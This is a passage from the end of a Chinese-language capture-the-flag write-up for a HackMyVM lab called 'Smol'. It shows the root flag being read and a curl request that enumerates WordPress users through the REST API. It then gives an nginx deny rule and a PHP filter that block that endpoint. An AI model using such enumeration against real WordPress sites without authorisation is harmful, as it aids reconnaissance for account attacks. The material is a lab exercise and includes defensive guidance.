-rw-r--r--  1 root root 3.2K Jun 21  2023 .bashrc
drwx------  2 root root 4.0K Jun  2  2023 .cache
-rw-------  1 root root   35 Mar 29  2024 .lesshst
drwxr-xr-x  3 root root 4.0K Jun 21  2023 .local
lrwxrwxrwx  1 root root    9 Aug 18  2023 .mysql_history -> /dev/null
drwxr-xr-x  4 root root 4.0K Aug 16  2023 .phpbrew
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Aug 16  2023 root.txt
-rw-r--r--  1 root root   75 Aug 17  2023 .selected_editor
drwx------  3 root root 4.0K Jun 21  2023 snap
drwx------  2 root root 4.0K Jun  2  2023 .ssh
-rw-rw-rw-  1 root root  13K Jun  7 07:34 .viminfo
root@smol:~$ cat root.txt 
bf89ea3ea01992353aef1f576214d4e4

其他尝试

突然想起来群主之前提到过wordpress有一处信息泄露:

┌──(kali💀kali)-[~/temp/Smol]
└─$ curl -s http://www.smol.hmv/index.php/wp-json/WP/V2/users/1 | jq
{
  "id": 1,
  "name": "admin",
  "url": "http://www.smol.hmv",
  "description": "",
  "link": "http://www.smol.hmv/index.php/author/admin/",
  "slug": "admin",
  "avatar_urls": {
    "24": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=24&d=monsterid&r=g",
    "48": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=48&d=monsterid&r=g",
    "96": "https://secure.gravatar.com/avatar/34704205919a3055db6e4930c4ea2180b94c3d103f12fa572b51c1a632676d33?s=96&d=monsterid&r=g"
  },
  "meta": [],
  "_links": {
    "self": [
      {
        "href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users/1",
        "targetHints": {
          "allow": [
            "GET"
          ]
        }
      }
    ],
    "collection": [
      {
        "href": "http://www.smol.hmv/index.php/wp-json/wp/v2/users"
      }
    ]
  }
}

需要配置防火墙用来防止相关泄露。。。。

参考:https://www.wpcom.cn/tutorial/301.html

server {
    location ~ ^/wp-json/wp/v2/users(/.*)?$ {
        deny all;
        return 403;
    }
}
/**
 * 禁用 WordPress 用户枚举接口,只有具有编辑权限(editor)及以上权限的用户才可访问。
 * 
 * @author WPCOM
 * @version 1.0.0
 * @since 2024-12-26
 */
add_filter('rest_endpoints', function ($endpoints) {
    global $has_users_endpoint;
    if($has_users_endpoint) return $endpoints;

    if(isset($endpoints['/wp/v2/users'])){
        $users_endpoint = $endpoints['/wp/v2/users'];
        unset($endpoints['/wp/v2/users']);
    }

    // 编辑及以上权限可展示用户列表
    if (defined('REST_REQUEST') && REST_REQUEST && current_user_can('editor')) {
        // 恢复 /wp/v2/users 端点
        if(isset($users_endpoint)) $endpoints['/wp/v2/users'] = $users_endpoint;
        $has_users_endpoint = true;
    }

    return $endpoints;
});
# functions.php
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇